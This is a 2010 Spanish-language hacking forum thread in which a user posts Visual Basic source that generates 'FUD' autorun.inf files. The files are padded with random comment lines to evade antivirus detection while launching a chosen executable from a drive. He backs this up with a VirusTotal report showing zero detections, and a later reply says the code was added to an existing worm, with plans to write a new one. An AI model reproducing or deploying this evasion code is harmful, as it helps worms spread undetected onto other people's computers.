[Src] Autorun.inf FUD (Pensaste que ya no servia LOL)

Iniciado por BlackZeroX, 27 Mayo 2010, 09:29 AM

0 Miembros y 1 Visitante están viendo este tema.

BlackZeroX

Bueno hace mucho que me la sabia como hacer un Autorun.Inf FUD solo que como ya abandono las malas practicas empesare a liberar algunos codigos sencillos pero utiles para algunos:

Este es un codigo para generar un archivo Autorun.inf 100% FUD indetectable ante AVIRA Norton, ... bueno ante cualquier AV... hasta la fecha sigue intacto xP.

OJO LOS AUTORU.INF SIEMPRE son DIFERENTES!¡.

Código (vb) [Seleccionar]


'
' ////////////////////////////////////////////////////////////////
' // Autor: BlackZeroX ( Ortega Avila Miguel Angel )            //
' //                                                            //
' // Web: http://InfrAngeluX.Sytes.Net/                         //
' //                                                            //
' // |-> Pueden Distribuir Este Codigo siempre y cuando         //
' // no se eliminen los creditos originales de este codigo      //
' // No importando que sea modificado/editado o engrandesido    //
' // o achicado, si es en base a este codigo                    //
' ////////////////////////////////////////////////////////////////

option explicit

Public Function GenerarAutorun(StrPath As String, StrExeNameExt As String) As Long
Dim Var(6)                                      As String
Dim DataWrite                                   As String
Dim i                                           As Integer
Dim RN                                          As Integer
Dim nMin                                        As Long
Dim nMax                                        As Long
Dim Sep                                         As String
Dim Char1                                       As String * 1
Dim Char2                                       As String * 1
   Var(0) = "[Autorun]"
   Var(1) = "Open = " & StrExeNameExt
   Var(2) = "UseAutoPlay = 1"
   Var(3) = "action = @" & StrExeNameExt
   Var(4) = "shell\open\Command = " & StrExeNameExt
   Var(5) = "shell\open\Default = 1"
   Var(6) = "shell\explore\Command = " & StrExeNameExt
   If Dir(StrPath, vbDirectory) <> "" Then
       Call NormalizePath(StrPath)
       StrPath = StrPath & "autorun.inf"
       Open StrPath For Binary As 1
           For i = 0 To 6
               DataWrite = vbCrLf & Var(i)
               nMin = NumeroAleatorio(100, 1000)
               nMax = nMin + NumeroAleatorio(100, 1000)
               For RN = 0 To NumeroAleatorio(nMin, nMax)
                   Char1 = Chr(NumeroAleatorio(50, 255))
                   Char2 = Chr(NumeroAleatorio(50, 255))
                   Sep = Chr$(NumeroAleatorio(1, 255))
                   While Sep = Char1 Or Sep = Char2: DoEvents
                       Sep = Chr$(NumeroAleatorio(1, 255))
                   Wend
                   DataWrite = DataWrite & vbCrLf & ";" & TextoAleatorio(Char1 & Sep & Char2, Sep, 1)
               Next RN
               Put 1, , DataWrite
           Next i
       Close 1
       GenerarAutorun = 1
   End If
ErrorFatal:
End Function
Private Sub NormalizePath(ByRef sData As String)
   sData = IIf(Right$(sData, 1) = "\", sData, sData & "\")
End Sub
Function TextoAleatorio(StrRango As String, Separador As String, Optional LENTEXTMIN As Long = 1, Optional LENTEXTMAX As Long = -1) As String
Dim spli()                                      As String
Dim i                                           As Double
   If InStr(StrRango, Separador) > 0 Then
       spli = Split(StrRango, Separador)
       LENTEXTMAX = LENTEXTMIN + Int(IIf(LENTEXTMAX = -1, NumeroAleatorio(1, 100), LENTEXTMAX))
       For i = LENTEXTMIN To LENTEXTMAX
           TextoAleatorio = TextoAleatorio & Chr(NumeroAleatorio(Asc(spli(0)), Asc(spli(1))))
       Next i
   End If
End Function
Public Function NumeroAleatorio(MinNum As Long, MaxNum As Long) As Long
Dim Tmp                                 As Long
   If MaxNum < MinNum Then: Tmp = MaxNum: MaxNum = MinNum: MinNum = Tmp
   Randomize: NumeroAleatorio = CLng((MinNum - MaxNum + 1) * Rnd + MaxNum)
End Function



la Llamada se realiza en alguna parte de su Codigo fuente de la siguiente manera:


Código (vb) [Seleccionar]


Call GenerarAutorun("c:\", "Ejecuta.exe")



Donde C:\ es la RUTA donde se guardara el archivo Autorun.inf y donde Ejecuta.exe es el archivo en el mismo directorio a ejecutar con el metodo Autorun.Inf

ahora si se quiere ejecutar el exe de un subdirectorio con el respoecto a donde se encuentra el Autorun.inf actual solo hay que hacerlo de la siguiente forma:

Código (vb) [Seleccionar]


Call GenerarAutorun("c:\", "Carpeta\SubCarpeta2\Ejecuta.exe")



Sangriento Infierno Lunar!¡.
The Dark Shadow is my passion.

Psyke1

#1
Impresionante!!!!!!!!!! :o
Que casualidad que estaba trabajando justo algo similar!!!!!!!!!!
Despues le echo un vistazo y si no entiendo pregunto ;-)

Salu2! ;D

BlackZeroX


}reporte desde VirusTotal... Ojo como no detecta nada y desde hace 2 años no lo ha hecho ningun AV sigue y debera seguir FUD


Análisis del archivo autorun.inf recibido el 2010.05.27 07:37:26 (UTC)
Motor antivirus Versión Última actualización Resultado
a-squared 4.5.0.50 2010.05.10 -
AhnLab-V3 2010.05.27.00 2010.05.27 -
AntiVir 8.2.1.242 2010.05.26 -
Antiy-AVL 2.0.3.7 2010.05.26 -
Authentium 5.2.0.5 2010.05.27 -
Avast 4.8.1351.0 2010.05.27 -
Avast5 5.0.332.0 2010.05.27 -
AVG 9.0.0.787 2010.05.27 -
BitDefender 7.2 2010.05.27 -
CAT-QuickHeal 10.00 2010.05.27 -
ClamAV 0.96.0.3-git 2010.05.27 -
Comodo 4942 2010.05.25 -
DrWeb 5.0.2.03300 2010.05.27 -
eSafe 7.0.17.0 2010.05.26 -
eTrust-Vet 35.2.7513 2010.05.27 -
F-Prot 4.6.0.103 2010.05.26 -
F-Secure 9.0.15370.0 2010.05.27 -
Fortinet 4.1.133.0 2010.05.26 -
GData 21 2010.05.27 -
Ikarus T3.1.1.84.0 2010.05.27 -
Jiangmin 13.0.900 2010.05.24 -
Kaspersky 7.0.0.125 2010.05.27 -
McAfee 5.400.0.1158 2010.05.27 -
McAfee-GW-Edition 2010.1 2010.05.27 -
Microsoft 1.5802 2010.05.27 -
NOD32 5148 2010.05.26 -
Norman 6.04.12 2010.05.26 -
nProtect 2010-05-26.01 2010.05.26 -
Panda 10.0.2.7 2010.05.26 -
PCTools 7.0.3.5 2010.05.27 -
Prevx 3.0 2010.05.27 -
Rising 22.49.03.01 2010.05.27 -
Sophos 4.53.0 2010.05.27 -
Sunbelt 6362 2010.05.27 -
Symantec 20101.1.0.89 2010.05.27 -
TheHacker 6.5.2.0.287 2010.05.25 -
TrendMicro 9.120.0.1004 2010.05.27 -
TrendMicro-HouseCall 9.120.0.1004 2010.05.27 -
VBA32 3.12.12.5 2010.05.26 -
ViRobot 2010.5.20.2326 2010.05.27 -
VirusBuster 5.0.27.0 2010.05.26



Dulce Infierno Lunar!¡.
The Dark Shadow is my passion.

Psyke1

ALA :o
Pense que despues del Conflicker esto era mas detectado... :silbar:

Salu2! ;)

BlackZeroX

Cita de: *PsYkE1* en 27 Mayo 2010, 09:47 AM
ALA :o
Pense que despues del Conflicker esto era mas detectado... :silbar:

Salu2! ;)

Mi codigo genera archivos autorun.inf de forma distinta SIEMPRE puedes cambiar los rango dentro del fuente si hay dudas avisar que explico las lines si es nesesario.

P.D.: Ya tiene 3 años que uso este metodo y hasta ahora no me lo a detectado ningun AV xP, y el reporte de Virus Total sigue en 0/41 LOL.

Dulce Infierno Lunar!¡,
The Dark Shadow is my passion.

Psyke1

Ya, ya vi que era de forma aleatoria... :P
Yo pensaba hacer algo asi, pero no lo tenia tan claro... :xD

Salu2!

Karcrack


BlackZeroX


Haber para que entiendan el codigo de forma rapida y precisa:

las variables o registros de un autorun.inf no se cifran ojo:
en un autorun.inf se le pueden adicionar lineas de comentarios (Esto no es nuevo).

* El codigo que pongo aqui lo que hace es meter lineas de comentarios Aleatroias.
* Los registros del autorun.inf siguen intactos (Si abren el archivo resultante y usan buscar y buscan [autorun], u otra linea las encontraran).
* Las longitudes de los textos como comentarios son aleatorios al igual que los que existen ente los registros del arhivo autorun.inf.
* El archivo resultante no pesa 1 o 3 kb pesa mas de 100kb por lo menos puede pesar tanto se desee!¡, pero el optimo para mi fue este que esta entre 200kb y 380kb.

Dulce Infierno Lunar!¡.
The Dark Shadow is my passion.

Karcrack

Eso esta clarisimo, solo digo que un ejemplo lo dejaria clarisimo!! :xD

n3fisto

Bueno no se si se acuerdan de la aplicacion TRIBANT del gusanito que fue sacado ya hace bastante tiempo, pues lo que hice fue añadirle la parte de codigo que indico, y wala no lo detecto el autorun.inf el avast 5.0 lo malo que al tribant si lo detectaron, estoy pensando hacer uso de reingenieria y poder crear el primer gusano homero